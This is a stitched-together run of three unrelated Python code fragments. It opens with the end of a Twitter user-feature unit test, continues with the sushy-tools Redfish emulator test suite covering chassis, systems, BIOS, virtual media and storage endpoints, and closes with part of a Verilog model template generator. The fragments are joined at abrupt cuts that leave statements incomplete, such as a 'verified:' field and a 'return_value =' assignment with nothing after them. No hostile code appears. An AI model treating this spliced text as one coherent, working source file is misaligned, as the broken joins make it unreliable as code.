"quoted_status_id": None,
"retweet_count": 2,
"favorite_count": 3,
"lang": "en",
"withheld_copyright": False,
"withheld_in_countries": None,
"entities": {
"urls": []
},
"source": "Twitter Android App",
"videos": 0,
"photos": 0,
"gifs": 0,
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
})
]
user_features = UserFeatures(user, tweets)
self.assertEqual(user_features[USER_FEATURES_INDEX["most_used_source"]], TWEET_SOURCES_IDX["Twitter Web App"])
def test_retweet_tweets_mean_nan(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": False,
"followers_count": 10,
"friends_count": 15,
"listed_count": 2,
"favourites_count": 50,
"statuses_count": 9,
"created_at": datetime.strptime("2000-01-01 00:00:00", DATE_TIME_FORMAT).strftime(TWITTER_DATE_TIME_FORMAT),
"profile_image_url_https": "",
"default_profile": True,
"default_profile_image": True,
"withheld_in_countries": "",
"fetch_date": datetime.strptime("2000-01-01 23:59:59", DATE_TIME_FORMAT)
}
user = User.parse(api=None, json=user_dic)
user_features = UserFeatures(user, [])
self.assertTrue(np.isnan(user_features[USER_FEATURES_INDEX["retweet_tweets_mean"]]))
def test_retweet_tweets_mean(self):
user_dic = {
"id": 1,
"name": "Test Account",
"screen_name": "test_account",
"location": "",
"url": None,
"expanded_url": None,
"description": "",
"protected": False,
"verified": | |
# Repo: alexpilotti/sushy-tools
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslotest import base
from sushy_tools.emulator import main
from sushy_tools import error
def patch_resource(name):
def decorator(func):
return mock.patch.object(main.Application, name,
new_callable=mock.PropertyMock)(func)
return decorator
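# patch_resource is a small convenience wrapper: it patches the named property on main.Application
# with a PropertyMock for the duration of the decorated test, which is why the test methods below
# receive one extra *_mock argument per applied decorator.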
class EmulatorTestCase(base.BaseTestCase):
name = 'QEmu-fedora-i686'
uuid = 'c7a5fdbd-cdaf-9455-926a-d65c16db1809'
def setUp(self):
self.app = main.app.test_client()
super(EmulatorTestCase, self).setUp()
class CommonTestCase(EmulatorTestCase):
@patch_resource('systems')
def test_error(self, systems_mock):
systems_mock.return_value.get_power_state.side_effect = Exception(
'Fish is dead')
response = self.app.get('/redfish/v1/Systems/' + self.uuid)
self.assertEqual(500, response.status_code)
def test_root_resource(self):
response = self.app.get('/redfish/v1/')
self.assertEqual(200, response.status_code)
self.assertEqual('RedvirtService', response.json['Id'])
class ChassisTestCase(EmulatorTestCase):
@patch_resource('chassis')
def test_chassis_collection_resource(self, chassis_mock):
chassis_mock.return_value.chassis = ['chassis0', 'chassis1']
response = self.app.get('/redfish/v1/Chassis')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Chassis/chassis0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Chassis/chassis1'},
response.json['Members'][1])
@patch_resource('indicators')
@patch_resource('systems')
@patch_resource('managers')
@patch_resource('chassis')
def test_chassis_resource_get(self, chassis_mock, managers_mock,
systems_mock, indicators_mock):
chassis_mock = chassis_mock.return_value
chassis_mock.chassis = ['xxxx-yyyy-zzzz']
chassis_mock.uuid.return_value = 'xxxx-yyyy-zzzz'
chassis_mock.name.return_value = 'name'
managers_mock.return_value.managers = ['man1']
systems_mock.return_value.systems = ['sys1']
indicators_mock.return_value.get_indicator_state.return_value = 'Off'
response = self.app.get('/redfish/v1/Chassis/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('xxxx-yyyy-zzzz', response.json['UUID'])
self.assertEqual('Off', response.json['IndicatorLED'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal'},
response.json['Thermal'])
self.assertEqual([{'@odata.id': '/redfish/v1/Systems/sys1'}],
response.json['Links']['ComputerSystems'])
self.assertEqual([{'@odata.id': '/redfish/v1/Managers/man1'}],
response.json['Links']['ManagedBy'])
self.assertEqual([{'@odata.id': '/redfish/v1/Managers/man1'}],
response.json['Links']['ManagersInChassis'])
@patch_resource('systems')
@patch_resource('chassis')
def test_chassis_thermal(self, chassis_mock, systems_mock):
chassis_mock = chassis_mock.return_value
chassis_mock.chassis = [self.uuid]
chassis_mock.uuid.return_value = self.uuid
systems_mock.return_value.systems = ['sys1']
response = self.app.get('/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal')
self.assertEqual(200, response.status_code)
self.assertEqual('Thermal', response.json['Id'])
self.assertEqual(
'/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal#/Temperatures/0',
response.json['Temperatures'][0]['@odata.id'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Systems/sys1/Processors/CPU'},
response.json['Temperatures'][0]['RelatedItem'][0])
self.assertEqual(
'/redfish/v1/Chassis/xxxx-yyyy-zzzz/Thermal#/Fans/0',
response.json['Fans'][0]['@odata.id'])
self.assertEqual(
{'@odata.id': '/redfish/v1/Chassis/xxxx-yyyy-zzzz'},
response.json['Fans'][0]['RelatedItem'][0])
@patch_resource('indicators')
@patch_resource('chassis')
def test_chassis_indicator_set_ok(self, chassis_mock, indicators_mock):
chassis_mock.return_value.uuid.return_value = self.uuid
data = {'IndicatorLED': 'Off'}
response = self.app.patch('/redfish/v1/Chassis/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.assert_called_once_with(self.uuid, 'Off')
@patch_resource('indicators')
@patch_resource('chassis')
def test_chassis_indicator_set_fail(self, chassis_mock, indicators_mock):
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.side_effect = error.FishyError
data = {'IndicatorLED': 'Blah'}
response = self.app.patch('/redfish/v1/Chassis/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(500, response.status_code)
class ManagersTestCase(EmulatorTestCase):
@patch_resource('managers')
def test_manager_collection_resource(self, managers_mock):
type(managers_mock.return_value).managers = mock.PropertyMock(
return_value=['bmc0', 'bmc1'])
response = self.app.get('/redfish/v1/Managers')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Managers/bmc0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Managers/bmc1'},
response.json['Members'][1])
@patch_resource('managers')
def test_manager_resource_get(self, managers_mock):
managers_mock = managers_mock.return_value
managers_mock.managers = ['xxxx-yyyy-zzzz']
managers_mock.get_manager.return_value = {
'UUID': 'xxxx-yyyy-zzzz',
'Name': 'name',
'Id': 'xxxx-yyyy-zzzz',
}
managers_mock.get_managed_systems.return_value = ['xxx']
managers_mock.get_managed_chassis.return_value = ['chassis0']
response = self.app.get('/redfish/v1/Managers/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code, response.json)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('xxxx-yyyy-zzzz', response.json['UUID'])
self.assertIsNone(response.json['ServiceEntryPointUUID'])
self.assertEqual([{'@odata.id': '/redfish/v1/Systems/xxx'}],
response.json['Links']['ManagerForServers'])
self.assertEqual([{'@odata.id': '/redfish/v1/Chassis/chassis0'}],
response.json['Links']['ManagerForChassis'])
class SystemsTestCase(EmulatorTestCase):
@patch_resource('systems')
def test_system_collection_resource(self, systems_mock):
type(systems_mock.return_value).systems = mock.PropertyMock(
return_value=['host0', 'host1'])
response = self.app.get('/redfish/v1/Systems')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id': '/redfish/v1/Systems/host0'},
response.json['Members'][0])
self.assertEqual({'@odata.id': '/redfish/v1/Systems/host1'},
response.json['Members'][1])
@patch_resource('indicators')
@patch_resource('chassis')
@patch_resource('managers')
@patch_resource('systems')
def test_system_resource_get(self, systems_mock, managers_mock,
chassis_mock, indicators_mock):
systems_mock = systems_mock.return_value
systems_mock.uuid.return_value = 'zzzz-yyyy-xxxx'
systems_mock.get_power_state.return_value = 'On'
systems_mock.get_total_memory.return_value = 1
systems_mock.get_total_cpus.return_value = 2
systems_mock.get_boot_device.return_value = 'Cd'
systems_mock.get_boot_mode.return_value = 'Legacy'
managers_mock.return_value.get_managers_for_system.return_value = [
'aaaa-bbbb-cccc']
chassis_mock.return_value.chassis = ['chassis0']
indicators_mock.return_value.get_indicator_state.return_value = 'Off'
response = self.app.get('/redfish/v1/Systems/xxxx-yyyy-zzzz')
self.assertEqual(200, response.status_code)
self.assertEqual('xxxx-yyyy-zzzz', response.json['Id'])
self.assertEqual('zzzz-yyyy-xxxx', response.json['UUID'])
self.assertEqual('On', response.json['PowerState'])
self.assertEqual('Off', response.json['IndicatorLED'])
self.assertEqual(
1, response.json['MemorySummary']['TotalSystemMemoryGiB'])
self.assertEqual(2, response.json['ProcessorSummary']['Count'])
self.assertEqual(
'Cd', response.json['Boot']['BootSourceOverrideTarget'])
self.assertEqual(
'Legacy', response.json['Boot']['BootSourceOverrideMode'])
self.assertEqual(
[{'@odata.id': '/redfish/v1/Managers/aaaa-bbbb-cccc'}],
response.json['Links']['ManagedBy'])
self.assertEqual(
[{'@odata.id': '/redfish/v1/Chassis/chassis0'}],
response.json['Links']['Chassis'])
@patch_resource('systems')
def test_system_resource_patch(self, systems_mock):
data = {'Boot': {'BootSourceOverrideTarget': 'Cd'}}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_boot_device = systems_mock.return_value.set_boot_device
set_boot_device.assert_called_once_with('xxxx-yyyy-zzzz', 'Cd')
@patch_resource('systems')
def test_system_reset_action(self, systems_mock):
set_power_state = systems_mock.return_value.set_power_state
for reset_type in ('On', 'ForceOn', 'ForceOff', 'GracefulShutdown',
'GracefulRestart', 'ForceRestart', 'Nmi'):
set_power_state.reset_mock()
data = {'ResetType': reset_type}
response = self.app.post(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/Actions/'
'ComputerSystem.Reset',
json=data)
self.assertEqual(204, response.status_code)
set_power_state.assert_called_once_with('xxxx-yyyy-zzzz',
reset_type)
@patch_resource('indicators')
@patch_resource('systems')
def test_system_indicator_set_ok(self, systems_mock, indicators_mock):
systems_mock.return_value.uuid.return_value = self.uuid
data = {'IndicatorLED': 'Off'}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(204, response.status_code)
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.assert_called_once_with(self.uuid, 'Off')
@patch_resource('indicators')
@patch_resource('systems')
def test_system_indicator_set_fail(self, systems_mock, indicators_mock):
set_indicator_state = indicators_mock.return_value.set_indicator_state
set_indicator_state.side_effect = error.FishyError
data = {'IndicatorLED': 'Blah'}
response = self.app.patch('/redfish/v1/Systems/xxxx-yyyy-zzzz',
json=data)
self.assertEqual(500, response.status_code)
class InstanceDeniedTestCase(EmulatorTestCase):
@mock.patch.dict(main.app.config, {}, clear=True)
def test_instance_denied_allow_all(self):
self.assertFalse(main.instance_denied(identity='x'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {}})
def test_instance_denied_disallow_all(self):
self.assertTrue(main.instance_denied(identity='a'))
def test_instance_denied_undefined_option(self):
with mock.patch.dict(main.app.config):
main.app.config.pop('SUSHY_EMULATOR_ALLOWED_INSTANCES', None)
self.assertFalse(main.instance_denied(identity='a'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {'a'}})
def test_instance_denied_allow_some(self):
self.assertFalse(main.instance_denied(identity='a'))
@mock.patch.dict(
main.app.config, {'SUSHY_EMULATOR_ALLOWED_INSTANCES': {'a'}})
def test_instance_denied_disallow_some(self):
self.assertTrue(main.instance_denied(identity='b'))
@patch_resource('systems')
class BiosTestCase(EmulatorTestCase):
def test_get_bios(self, systems_mock):
systems_mock.return_value.get_bios.return_value = {
"attribute 1": "value 1",
"attribute 2": "value 2"
}
response = self.app.get('/redfish/v1/Systems/' + self.uuid + '/BIOS')
self.assertEqual(200, response.status_code)
self.assertEqual('BIOS', response.json['Id'])
self.assertEqual({"attribute 1": "value 1",
"attribute 2": "value 2"},
response.json['Attributes'])
def test_get_bios_existing(self, systems_mock):
systems_mock.return_value.get_bios.return_value = {
"attribute 1": "value 1",
"attribute 2": "value 2"
}
response = self.app.get(
'/redfish/v1/Systems/' + self.uuid + '/BIOS/Settings')
self.assertEqual(200, response.status_code)
self.assertEqual('Settings', response.json['Id'])
self.assertEqual(
{"attribute 1": "value 1",
"attribute 2": "value 2"},
response.json['Attributes'])
def test_bios_settings_patch(self, systems_mock):
data = {'Attributes': {'key': 'value'}}
response = self.app.patch(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/BIOS/Settings',
json=data)
self.assertEqual(204, response.status_code)
systems_mock.return_value.set_bios.assert_called_once_with(
'xxxx-yyyy-zzzz', {'key': 'value'})
def test_set_bios(self, systems_mock):
data = {'Attributes': {'key': 'value'}}
response = self.app.patch(
'/redfish/v1/Systems/xxxx-yyyy-zzzz/BIOS/Settings',
json=data)
self.assertEqual(204, response.status_code)
systems_mock.return_value.set_bios.assert_called_once_with(
'xxxx-yyyy-zzzz', data['Attributes'])
def test_reset_bios(self, systems_mock):
response = self.app.post('/redfish/v1/Systems/%s/BIOS/Actions/'
'Bios.ResetBios' % self.uuid)
self.assertEqual(204, response.status_code)
systems_mock.return_value.reset_bios.assert_called_once_with(self.uuid)
@patch_resource('systems')
class EthernetInterfacesTestCase(EmulatorTestCase):
def test_ethernet_interfaces_collection(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}]
response = self.app.get('redfish/v1/Systems/%s/EthernetInterfaces'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Ethernet Interface Collection',
response.json['Name'])
self.assertEqual(2, response.json['Members@odata.count'])
self.assertEqual(['/redfish/v1/Systems/%s/EthernetInterfaces/nic1'
% self.uuid,
'/redfish/v1/Systems/%s/EthernetInterfaces/nic2'
% self.uuid],
[m['@odata.id'] for m in response.json['Members']])
def test_ethernet_interfaces_collection_empty(self, systems_mock):
systems_mock.return_value.get_nics.return_value = []
response = self.app.get('redfish/v1/Systems/%s/EthernetInterfaces'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Ethernet Interface Collection',
response.json['Name'])
self.assertEqual(0, response.json['Members@odata.count'])
self.assertEqual([], response.json['Members'])
def test_ethernet_interface(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}]
response = self.app.get('/redfish/v1/Systems/%s/EthernetInterfaces/'
'nic2' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('nic2', response.json['Id'])
self.assertEqual('VNIC nic2', response.json['Name'])
self.assertEqual('00:11:22:33:44:55',
response.json['PermanentMACAddress'])
self.assertEqual('00:11:22:33:44:55',
response.json['MACAddress'])
self.assertEqual('/redfish/v1/Systems/%s/EthernetInterfaces/nic2'
% self.uuid,
response.json['@odata.id'])
def test_ethernet_interface_not_found(self, systems_mock):
systems_mock.return_value.get_nics.return_value = [
{'id': 'nic1', 'mac': '52:54:00:4e:5d:37'},
{'id': 'nic2', 'mac': '00:11:22:33:44:55'}
]
response = self.app.get('/redfish/v1/Systems/%s/EthernetInterfaces/'
'nic3' % self.uuid)
self.assertEqual(404, response.status_code)
@patch_resource('vmedia')
@patch_resource('managers')
class VirtualMediaTestCase(EmulatorTestCase):
def test_virtual_media_collection(self, managers_mock, vmedia_mock):
managers_mock = managers_mock.return_value
managers_mock.managers = [self.uuid]
managers_mock.get_manager.return_value = {'UUID': self.uuid}
vmedia_mock.return_value.devices = ['CD', 'Floppy']
response = self.app.get(
'redfish/v1/Managers/%s/VirtualMedia' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Virtual Media Services', response.json['Name'])
self.assertEqual(2, response.json['Members@odata.count'])
self.assertEqual(
['/redfish/v1/Managers/%s/VirtualMedia/CD' % self.uuid,
'/redfish/v1/Managers/%s/VirtualMedia/Floppy' % self.uuid],
[m['@odata.id'] for m in response.json['Members']])
def test_virtual_media_collection_empty(self, managers_mock, vmedia_mock):
vmedia_mock.return_value.get_devices.return_value = []
response = self.app.get(
'redfish/v1/Managers/' + self.uuid + '/VirtualMedia')
self.assertEqual(200, response.status_code)
self.assertEqual('Virtual Media Services', response.json['Name'])
self.assertEqual(0, response.json['Members@odata.count'])
self.assertEqual([], response.json['Members'])
def test_virtual_media(self, managers_mock, vmedia_mock):
vmedia_mock = vmedia_mock.return_value
vmedia_mock.get_device_name.return_value = 'CD'
vmedia_mock.get_device_media_types.return_value = [
'CD', 'DVD']
vmedia_mock.get_device_image_info.return_value = [
'image-of-a-fish', 'fishy.iso', True, True]
response = self.app.get(
'/redfish/v1/Managers/%s/VirtualMedia/CD' % self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('CD', response.json['Id'])
self.assertEqual(['CD', 'DVD'], response.json['MediaTypes'])
self.assertEqual('fishy.iso', response.json['Image'])
self.assertEqual('image-of-a-fish', response.json['ImageName'])
self.assertTrue(response.json['Inserted'])
self.assertTrue(response.json['WriteProtected'])
def test_virtual_media_not_found(self, managers_mock, vmedia_mock):
vmedia_mock.return_value.get_device_name.side_effect = error.FishyError
response = self.app.get(
'/redfish/v1/Managers/%s/VirtualMedia/DVD-ROM' % self.uuid)
self.assertEqual(404, response.status_code)
def test_virtual_media_insert(self, managers_mock, vmedia_mock):
response = self.app.post(
'/redfish/v1/Managers/%s/VirtualMedia/CD/Actions/'
'VirtualMedia.InsertMedia' % self.uuid,
json={"Image": "http://fish.iso"})
self.assertEqual(204, response.status_code)
vmedia_mock.return_value.insert_image.assert_called_once_with(
'CD', 'http://fish.iso', True, False)
def test_virtual_media_eject(self, managers_mock, vmedia_mock):
response = self.app.post(
'/redfish/v1/Managers/%s/VirtualMedia/CD/Actions/'
'VirtualMedia.EjectMedia' % self.uuid,
json={})
self.assertEqual(204, response.status_code)
vmedia_mock.return_value.eject_image.assert_called_once_with('CD')
@patch_resource('systems')
class StorageTestCase(EmulatorTestCase):
def test_simple_storage_collection(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('redfish/v1/Systems/%s/SimpleStorage'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Simple Storage Collection',
response.json['Name'])
self.assertEqual(2, response.json['Members@odata.count'])
self.assertEqual({'/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid,
'/redfish/v1/Systems/%s/SimpleStorage/ide'
% self.uuid},
{m['@odata.id'] for m in response.json['Members']})
def test_simple_storage_collection_empty(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = []
response = self.app.get('redfish/v1/Systems/%s/SimpleStorage'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('Simple Storage Collection',
response.json['Name'])
self.assertEqual(0, response.json['Members@odata.count'])
self.assertEqual([], response.json['Members'])
def test_simple_storage(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid)
self.assertEqual(200, response.status_code)
self.assertEqual('virtio', response.json['Id'])
self.assertEqual('virtio Controller', response.json['Name'])
self.assertEqual('testVM1.img', response.json['Devices'][0]['Name'])
self.assertEqual(100000, response.json['Devices'][0]['CapacityBytes'])
self.assertEqual('sdb1', response.json['Devices'][1]['Name'])
self.assertEqual(150000, response.json['Devices'][1]['CapacityBytes'])
self.assertEqual('/redfish/v1/Systems/%s/SimpleStorage/virtio'
% self.uuid,
response.json['@odata.id'])
def test_simple_storage_not_found(self, systems_mock):
systems_mock = systems_mock.return_value
systems_mock.get_simple_storage_collection.return_value = {
'virtio': {
'Id': 'virtio',
'Name': 'virtio',
'DeviceList': [
{
'Name': 'testVM1.img',
'CapacityBytes': 100000
},
{
'Name': 'sdb1',
'CapacityBytes': 150000
}
]
},
'ide': {
'Id': 'ide',
'Name': 'ide',
'DeviceList': [
{
'Name': 'testVol1.img',
'CapacityBytes': 200000
},
{
'Name': 'blk-pool0-vol0',
'CapacityBytes': 300000
}
]
}
}
response = self.app.get('/redfish/v1/Systems/%s/SimpleStorage/scsi'
% self.uuid)
self.assertEqual(404, response.status_code)
@patch_resource('storage')
def test_storage_collection_resource(self, storage_mock, systems_mock):
storage_mock.return_value.get_storage_col.return_value = [
{
"Id": "1",
"Name": "Local Storage Controller",
"StorageControllers": [
{
"MemberId": "0",
"Name": "Contoso Integrated RAID",
"SpeedGbps": 12
}
]
}
]
response = self.app.get('redfish/v1/Systems/vbmc-node/Storage')
self.assertEqual(200, response.status_code)
self.assertEqual({'@odata.id':
'/redfish/v1/Systems/vbmc-node/Storage/1'},
response.json['Members'][0])
@patch_resource('storage')
def test_storage_resource_get(self, storage_mock, systems_mock):
storage_mock.return_value.get_storage_col.return_value =
def description(cls, m): # retrieve description of a metric 'm'
try:
return cls.property(m, 'description')
except:
return ''
@classmethod
def value(cls, m): # retrieve the value of a metric 'm'
return cls.property(m, 'value')
@classmethod
def print_if_exists(cls, statement, m):
'''
Print a Verilog statement if metric m exists.
Note that @@ is replaced with @ in this function.
Therefore do not use this function if the statement has @ for Verilog such as 'always @'
'''
return statement.replace('@@','@') if cls.is_exist(m) else ''
##############################
# Miscellaneous functions
##############################
def get_sensitivity_list():
'''
return default sensitivity list
'''
return REAL.list_optional_pins() + PWL.list_optional_pins_in_real() + LOGIC.list_optional_pins()
def print_sensitivity_list(list_val):
'''
print out sensitivity list in Verilog format
'''
if list_val == []:
return '*'
else:
return ' or '.join(list_val)
def annotate_modelparam(param_map, variable_map={}):
'''
Create verilog statements to back annotate the extracted parameters to variables
param_map = { testname : { testresponse : verilog variable being mapped to }, ... }
variable_map is a dictionary that maps predictor variable in a test to a Verilog variable.
variable_map = { var1 : Verilog_var1, var2 : Verilog_var2, ... }
This also takes digital modes into account.
'''
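# Illustrative sketch only (the names below are hypothetical, not from the source):
#   annotate_modelparam({'test_gain': {'gain': 'k_gain'}}, {'vin': 'v_in'})
# would emit a templated Verilog block that assigns k_gain from the extracted
# 'gain' response of 'test_gain', with one case branch per digital mode.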
#if 'variable_map' not in globals():
# variable_map = {}
digital_modes = ["get_lm_equation_modes('%s', '%s')" % (k, v.keys()[0]) for k,v in param_map.items()]
digital_cases = ['digital_modes[%d][0].keys()' % i for i in range(len(digital_modes))]
vlog_1 = 'digital_modes = [%s]\\n' % ', '.join(digital_modes)
vlog_2 = 'digital_cases = [%s]\\n' % ', '.join(digital_cases)
vlog_3 = 'variable_map = {v_map}\\n'.format(v_map = variable_map)
vlog = '$${\\n' + vlog_1 + vlog_2 + vlog_3 + '}$$\\n'
for i, t in enumerate(param_map.keys()):
vlog += _annotate_verilog_statement(t, param_map[t], i)
return vlog
def _annotate_verilog_statement(testname, param_map_value, case_index):
vlog_statement_template = '''
$$[if not mode_exists('{testname}')]
{vlog_statement1}
$$[else]
case({{$$(','.join({casenumber}))}})
$$[for m in {modenumber}]
{{$$(','.join(["%d'b%s" % (Pin.vectorsize(d), dec2bin('%d'%m[d], Pin.vectorsize(d))) for d in {casenumber}]))}}: begin
{vlog_statement2}
end
$$[end for]
default: begin
{vlog_statement3}
end
endcase
$$[end if]
'''
vlog = ''
template_base = "{variable} = $$get_lm_equation('{testname}', '{response}'"
casenumber = 'digital_cases[%d]' % case_index
modenumber = 'digital_modes[%d]' % case_index
template = template_base + ');'
vlog_statement1 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
template = template_base + ', m);'
vlog_statement2 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
template = template_base + ', %s[0]);' % modenumber
vlog_statement3 = ' '+'\\n '.join([template.format(variable=v, testname=testname, response=k) for k,v in param_map_value.items()])
vlog += vlog_statement_template.format(testname=testname, casenumber=casenumber, modenumber=modenumber, vlog_statement1 = vlog_statement1, vlog_statement2 = vlog_statement2, vlog_statement3 = vlog_statement3)
return vlog
################
# LOGIC-specific
################
class LOGIC(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), print_bus(Pin.vectorsize(p)), Pin.name(p), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), print_bus(Pin.vectorsize(p)), p)
@classmethod
def list_optional_pins(cls, exclude=[]): # return generic pin names of (digital)
return [p for p in list(set(Pin.list_optional())-set(exclude)) if Pin.datatype(p) in ['logic', '']]
################
# REAL-specific
################
class REAL(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), print_bus(Pin.vectorsize(p)), Pin.name(p), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), p, print_bus(Pin.vectorsize(p)))
@classmethod
def list_optional_pins(cls, exclude=[]):
'''
Get a list of real signal expressions for optional real analog pins
'''
return [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="real"]
##############
# PWL-specific
##############
class PWL(object):
@classmethod
def declare_pin(cls, p, comma=False):
''' print a pin in module declaration. A comma will follow if comma==True '''
return '%s %s %s %s%s // %s' % (Pin.direction(p), Pin.datatype(p), Pin.name(p), print_bus(Pin.vectorsize(p)), ',' if comma else '', Pin.description(p))
@classmethod
def declare_signal(cls, p):
return '%s %s %s;' %(Pin.datatype(p), p, print_bus(Pin.vectorsize(p)))
@classmethod
def get_real(cls, signame):
'''
Get a real signal expression for given pwl signal name (signame)
'''
return '%s_r' % signame
@classmethod
def list_optional_pins(cls, exclude=[]):
'''
Get a list of real signal expressions for optional pwl analog pins
'''
pl = [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="pwl"]
return map(cls.get_real, pl)
@classmethod
def list_optional_pins_in_real(cls, exclude=[]):
'''
Get a list of real signal expressions for optional pwl analog pins with real suffix
'''
return cls.list_optional_pins(exclude)
@classmethod
def instantiate_pwl2real(cls, signame):
'''
Convert PWL waveform to PWC waveform for a given signal name, using pwl2real primitive.
Output "real" signal has the same signal name as its PWL signal, but it will be followed by a suffix "_r"
'''
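# For a hypothetical signal 'vout', the template below expands to:
#   pwl2real #(.dv(etol_vout)) xp2r_vout (.in(vout), .out(vout_r)); // pwl-to-real of vout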
return 'pwl2real #(.dv(etol_{signal})) xp2r_{signal} (.in({signal}), .out({signal}_r)); // pwl-to-real of {signal}'.format(signal=signame)
@classmethod
def declare_real(cls, sig_list):
'''
Declare the corresponding "real" signal (wire) of a PWL signal
The "real" signal will have the same signal
'''
if len(sig_list) > 0:
return 'real %s;' % ', '.join(sig_list)
else:
return ''
@classmethod
def declare_optional_analog_pins_in_real(cls, exclude=[]):
'''
declare optional analog pins with real datatype suffix
'''
pl_real = list(set(cls.list_optional_pins())-set(exclude))
return cls.declare_real(pl_real)
@classmethod
def instantiate_pwl2real_optional_analog_pins(cls, exclude=[]):
'''
do instantiate_pwl2real for all optional analog pins
'''
pl = [p for p in list(set(Pin.list_optional_analog())-set(exclude)) if Pin.datatype(p)=="pwl"]
_statements = map(cls.instantiate_pwl2real, pl)
return '\\n'.join(_statements)
}@
"""
TEST_PRIMITIVE_FUNCTIONS = """@{
##############################
# test primitive functions
##############################
class Test(object):
@classmethod
def dut(cls): # print dut name
return Module.name()
class TestPort(object):
@classmethod
def declare_optional_pins_prime(cls, port_name, is_digital):
'''
Declare port specifiction in test for given port
'''
if is_digital:
spec = {'port_type': 'digitalmode', 'encode':'binary', 'prohibited': '', 'pinned': 'False', 'default_value': 'b0'}
template = ''' [[[{port_name}]]]
port_type = {port_type}
bit_width = {bit_width}
encode = {encode}
prohibited = {prohibited}
pinned = {pinned}
default_value = {default_value}
description = {description}
'''
else:
spec = {'port_type': 'analoginput', 'regions': '0.0, 1.0', 'pinned': 'False', 'default_value': '0.5'}
template = ''' [[[{port_name}]]]
port_type = {port_type}
regions = {regions}
pinned = {pinned}
default_value = {default_value}
